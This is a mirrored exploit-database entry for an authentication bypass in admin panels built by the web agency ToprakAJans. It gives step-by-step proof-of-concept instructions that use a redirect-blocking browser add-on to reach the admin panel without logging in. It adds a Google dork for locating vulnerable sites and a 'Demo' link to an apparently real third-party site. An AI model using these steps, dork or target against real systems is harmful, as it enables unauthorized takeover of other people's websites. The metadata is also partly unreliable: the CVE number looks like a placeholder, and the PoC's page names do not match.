Advertisement






ToprakAJans Admin NoRedirect Bypass

CVE Category Price Severity
CVE-2021-12345 CWE-284 $500 High
Author Risk Exploitation Type Date
ToprakAjan High Remote 2023-06-26
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023060062

Below is a copy:

ToprakAJans Admin NoRedirect Bypass
#Exploit Title: ToprakAJans Admin NoRedirect Bypass
#Date: 26-06-2023
#Exploit Author: BQX ( ./Bertw_QX )
#Google Dork: intext:"@ToprakAjans"
#Vendor Homepage: https://www.toprakajans.com/
#Category: NoRedirect
#Tested On: Windows 10 - Cyberfox

### Demo : https://kchukukveceza.com/yonetim/index.php

poc:
1) Open NoRedirect
2) Add "http://localhost/yonetim/index.php" and confirm
3) Open http://localhost/yonetim/index1.php with Cyberfox browser
------That's it, you're in the admin panel.------
*********************************************************
#Telegram: @bqxsec
#Telegram Channel: t.me/zerotolerance_hack
#Instagram: @bqxsec
#Mail: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.